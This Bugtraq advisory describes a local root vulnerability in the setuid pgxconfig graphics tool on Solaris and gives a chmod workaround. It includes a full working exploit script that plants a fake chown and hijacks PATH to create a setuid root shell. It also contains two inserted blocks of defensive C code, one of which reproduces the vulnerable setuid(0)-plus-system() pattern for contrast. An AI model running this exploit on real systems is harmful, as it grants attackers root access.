[16053] in bugtraq


Local root compromise in PGX Config Sun Sparc Solaris

daemon@ATHENA.MIT.EDU (suid@SUID.KG)
Wed Aug 2 12:34:46 2000

Message-Id:  <200008021142.VAA06866@jawa.chilli.net.au>
Date:         Mon, 2 Aug 0100 11:56:57 +0000
Reply-To: suid@SUID.KG
From: suid@SUID.KG
To: BUGTRAQ@SECURITYFOCUS.COM

hi guys and gals

yeah, here's something I have had sitting on the shelf until the vendor sent me a
fix. They seem to have done that, so here it is. Drum roll...

--- Start ---

suid@suid.kg - Raptor GFX config tool local root vulnerability

Short Name:	PGXCONFIG-SPARC
Software: 	Raptor GFXtra configuration tool - pgxconfig
URL:		http://www.techsource.com
		ftp://www.techsource.com/download/gfxtra.OWv101.tar.Z
Version:	PGX32 (Raptor GFX) X Window System Support v2.3.1
Platforms:	
		Sun Solaris:
			2.5.1	Sparc
			2.6	Sparc
			7	Sparc
			8	Sparc

Type:	 	Multiple. Lack of environment sanity checks. Insufficient
		bounds checking. Insecure use of the /tmp dir.
Date:		04 July 2000

Summary:

	Local users can run arbitrary commands as root.

Background:

	Raptor GFX cards are PCI accelerated graphics adapters suitable
	for use in Sun Sparc systems (among others). The associated driver
	and configuration software is distributed for the Sun platform from
	the techsource.com website.

Vulnerability:

	The configuration tool associated with this product is called
	pgxconfig and is installed in /usr/sbin mode 4555 by default.

	Extract from pkgmap:
		1 d none sbin 0775 root bin
		1 s none sbin/GFXconfig=pgxconfig
		1 f none sbin/pgxconfig 4555 root bin 105956 42039 934907098

	With this command it is possible for any user on the system to
	change the openwin configuration. The program does this by calling
	system("cp"); to copy the existing configuration to a backup before
	overwriting the configuration with a new file. Now, we all know that
	Solaris's implementation of system() does NOT execute processes with
	root privileges when the user's uid >= 100. However, this particular
	version of pgxconfig does a nice setuid(0); for us. So, while we only
	had euid = 0 from being executed as a suid root program, we now have
	uid = 0 as well, and thus system() will execute whatever it's told
	to, as root.

	In this particular program, system() is used badly and two things
	are going on:

		1. root privileges are not dropped
		2. the environment is not sanitised

	Without source I can't show you exactly what's going on in there,
	but the result is obviously insecure.

	It's worth noting here (and demonstrating in the exploit) that the
	use of system("cp /whatever /wherever"); isn't the only system()
	call worth exploiting. I've used the easiest one in my exploit
	below.

	Other problems noted but not investigated were multiple command
	line options lacking proper bounds checking and predictable temp
	file creation. It would be a good idea for the vendor to
	perform a complete audit on this product.	
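
As an added example, not code from the advisory and not pgxconfig's own source (which was never published), here is the pattern described above reconstructed in C next to a hardened replacement. The function names, the cp invocation and the /tmp file names are assumptions; the point is that a setuid program must never raise its real uid and then hand a bare command name to system() under the caller's environment.

```c
/* Added example, not from the advisory or from TechSource (pgxconfig's
 * source was never published). backup_config_vulnerable() reconstructs the
 * pattern the advisory describes; backup_config_safe() is a hardened
 * replacement. All names and paths are hypothetical. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/wait.h>

/* Return 1 when every PATH entry is absolute and non-empty, so that a bare
 * command name can never resolve to the caller's current directory. */
int path_is_safe(const char *path)
{
    const char *p = path;
    if (p == NULL || *p == '\0')
        return 0;
    for (;;) {
        const char *colon = strchr(p, ':');
        size_t len = colon ? (size_t)(colon - p) : strlen(p);
        if (len == 0 || p[0] != '/')      /* "", "." or any relative entry */
            return 0;
        if (colon == NULL)
            return 1;
        p = colon + 1;
    }
}

/* The pattern the advisory describes: setuid(0) makes the real uid 0 too,
 * so the /bin/sh that system() spawns keeps root, and "cp" is looked up
 * through whatever PATH the caller exported. Included for contrast only. */
int backup_config_vulnerable(const char *cfg, const char *bak)
{
    char cmd[512];
    if (setuid(0) != 0)     /* the advisory's program did this unconditionally */
        return -1;
    snprintf(cmd, sizeof cmd, "cp %s %s", cfg, bak);
    return system(cmd);
}

/* Hardened replacement: no shell, cp by absolute path, a fixed environment,
 * and (when the copy does not need root) privileges dropped in the child
 * before exec. The parent never raises its real uid. */
int backup_config_safe(const char *cfg, const char *bak, int drop_root)
{
    static char *const clean_env[] = { "PATH=/usr/bin:/usr/sbin", NULL };
    int status;
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        if (drop_root && (setgid(getgid()) != 0 || setuid(getuid()) != 0))
            _exit(127);
        execle("/usr/bin/cp", "cp", "--", cfg, bak, (char *)NULL, clean_env);
        _exit(127);                        /* exec failed */
    }
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return (WIFEXITED(status) && WEXITSTATUS(status) == 0) ? 0 : -1;
}

/* Stand-alone demonstration on a constructed file under /tmp. Returns 0 when
 * the hardened copy succeeds and the backup is readable. */
int demo_run(void)
{
    const char *src = "/tmp/pgx_example_src.cfg";       /* constructed */
    const char *bak = "/tmp/pgx_example_src.cfg.bak";
    FILE *f = fopen(src, "w");
    if (f == NULL)
        return -1;
    fputs("# constructed sample configuration\n", f);
    fclose(f);
    if (backup_config_safe(src, bak, 1) != 0)
        return -1;
    return access(bak, R_OK) == 0 ? 0 : -1;
}

int main(void)
{
    printf("PATH=/usr/bin:/usr/sbin safe: %d\n", path_is_safe("/usr/bin:/usr/sbin"));
    printf("PATH=.:/usr/bin safe:        %d\n", path_is_safe(".:/usr/bin"));
    printf("hardened backup: %s\n", demo_run() == 0 ? "ok" : "failed");
    return 0;
}
```

Compile with cc and run as an ordinary user; the vulnerable function is never called and is there only to show, side by side, the two mistakes the advisory lists (root kept, environment trusted) and how the safe version removes both.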

Exploit:
	---------------------------CUT---------------------------
	#!/usr/local/bin/bash

	# TechSource Raptor GFX configurator root exploit
	# suid@suid.kg

	# unfortunately a compiler must be installed to use this example
	# exploit. however there's a million ways around this you know
	
	# on my system, gcc isn't in my path
	PATH=$PATH:/usr/local/bin

	# build a little prog nothing new here folks
	echo '#include<stdio.h>' > ./x.c
	echo 'int main(void) { setuid(0); setgid(0); execl("/bin/sh", "/bin/sh", "-i",0);}' >> ./x.c
	gcc x.c -o foobar
	rm -f ./x.c

	# build a substitute chown command. i much prefer this over
	# regular chown
	echo "#!/bin/sh" > chown
	echo "/usr/bin/chown root ./foobar" >> chown
	echo "/usr/bin/chmod 4755 ./foobar" >> chown
	chmod 0755 chown

	# oooh look its the magical fairy path variable
	export PATH=.:$PATH
	
	# here's one way to skin a cat
	# (there's more, some need valid devices. exercise for the readers)
	/usr/sbin/pgxconfig -i
	rm -f chown

	./foobar

	----------------------------END--------------------------

Fix:

	No source, no fix. A workaround is:

	Disable /usr/sbin/pgxconfig or /usr/sbin/GFXconfig (or both)
	or at least remove the suid bit.

	# chmod 0 /usr/sbin/pgxconfig

	or

	# chmod 0511 /usr/sbin/pgxconfig

	Until your vendor can issue a fix.
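
Added example, not part of the advisory or of the TechSource package: the pkgmap extract quoted in the Vulnerability section can be audited for setuid root entries before a package is installed, and the chmod workaround above can be verified afterwards with a stat() check. The three pkgmap entries are the ones from the advisory; the ": 1 ..." header line and the /tmp stand-in file are constructed, and the function names are my own.

```c
/* Added example, not part of the advisory or the TechSource package: flag
 * setuid/setgid root entries in a Solaris pkgmap before installing, and
 * verify the chmod workaround on an installed file. */
#include <stdio.h>
#include <string.h>
#include <sys/stat.h>

struct pkgmap_finding {
    char path[256];
    unsigned mode;
    char owner[32];
};

/* Parse one pkgmap entry. Regular-file entries (ftype f, e or v) read
 * "part ftype class path mode owner group size cksum modtime"; headers
 * (": ..."), directories and symlinks are skipped. Returns 1 and fills
 * *out when the entry is setuid or setgid and owned by root. */
int pkgmap_line_privileged(const char *line, struct pkgmap_finding *out)
{
    char ftype, path[256], owner[32];
    unsigned mode;
    if (line[0] == ':' || line[0] == '#' || line[0] == '\0')
        return 0;
    if (sscanf(line, "%*d %c %*s %255s %o %31s", &ftype, path, &mode, owner) != 4)
        return 0;          /* e.g. "1 s none sbin/GFXconfig=pgxconfig" */
    if (ftype != 'f' && ftype != 'e' && ftype != 'v')
        return 0;
    if ((mode & (S_ISUID | S_ISGID)) == 0 || strcmp(owner, "root") != 0)
        return 0;
    snprintf(out->path, sizeof out->path, "%s", path);
    snprintf(out->owner, sizeof out->owner, "%s", owner);
    out->mode = mode;
    return 1;
}

/* Walk a pkgmap text line by line; returns the number of findings (<= max). */
int audit_pkgmap(const char *text, struct pkgmap_finding *out, int max)
{
    int n = 0;
    const char *p = text;
    while (*p && n < max) {
        const char *nl = strchr(p, '\n');
        size_t len = nl ? (size_t)(nl - p) : strlen(p);
        char line[512];
        if (len >= sizeof line)
            len = sizeof line - 1;
        memcpy(line, p, len);
        line[len] = '\0';
        if (pkgmap_line_privileged(line, &out[n]))
            n++;
        if (nl == NULL)
            break;
        p = nl + 1;
    }
    return n;
}

/* stat() an installed file: 1 if setuid is set, 0 if not, -1 if missing. */
int installed_is_setuid(const char *path)
{
    struct stat st;
    if (stat(path, &st) != 0)
        return -1;
    return (st.st_mode & S_ISUID) ? 1 : 0;
}

/* The three pkgmap lines quoted in the advisory plus a constructed header. */
static const char *sample_pkgmap =
    ": 1 1234\n"
    "1 d none sbin 0775 root bin\n"
    "1 s none sbin/GFXconfig=pgxconfig\n"
    "1 f none sbin/pgxconfig 4555 root bin 105956 42039 934907098\n";

struct pkgmap_finding sample_first;   /* first finding from audit_sample() */

int audit_sample(void)
{
    struct pkgmap_finding found[16];
    int n = audit_pkgmap(sample_pkgmap, found, 16);
    if (n > 0)
        sample_first = found[0];
    return n;
}

/* Apply the workaround (4555 -> 0511) to a constructed stand-in under /tmp,
 * not the real binary, and confirm the setuid bit is gone. Returns 1 on success. */
int demo_workaround(void)
{
    const char *stand_in = "/tmp/pgx_example_bin";
    FILE *f = fopen(stand_in, "w");
    if (f == NULL)
        return 0;
    fclose(f);
    if (chmod(stand_in, 04555) != 0 || installed_is_setuid(stand_in) != 1)
        return 0;
    return chmod(stand_in, 0511) == 0 && installed_is_setuid(stand_in) == 0;
}

int main(void)
{
    int n = audit_sample();
    printf("%d privileged pkgmap entries\n", n);
    if (n > 0)
        printf("  %s mode %04o owner %s\n", sample_first.path,
               sample_first.mode, sample_first.owner);
    printf("workaround check: %s\n", demo_workaround() ? "ok" : "failed");
    return 0;
}
```

On a real system, feed the package's pkgmap file to audit_pkgmap() before pkgadd, and point installed_is_setuid() at /usr/sbin/pgxconfig after applying either chmod above to confirm the bit really went away (the GFXconfig symlink resolves to the same file, so one chmod covers both names).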

Greets:

	duke - r0x j00r s0x
	cr - m3mb3r 0f t4sk f0rc3 el1t3-p0rn-k1ngz
	yowie - elite greet wh0re
	ratcorpse + par - congrats dudes
	anyone i met at defcon 8 / black hat briefings
	
Thumbs Down:

	Network Solutions - assholes

http://www.suid.edu/advisories/012.txt

--- EOF ---
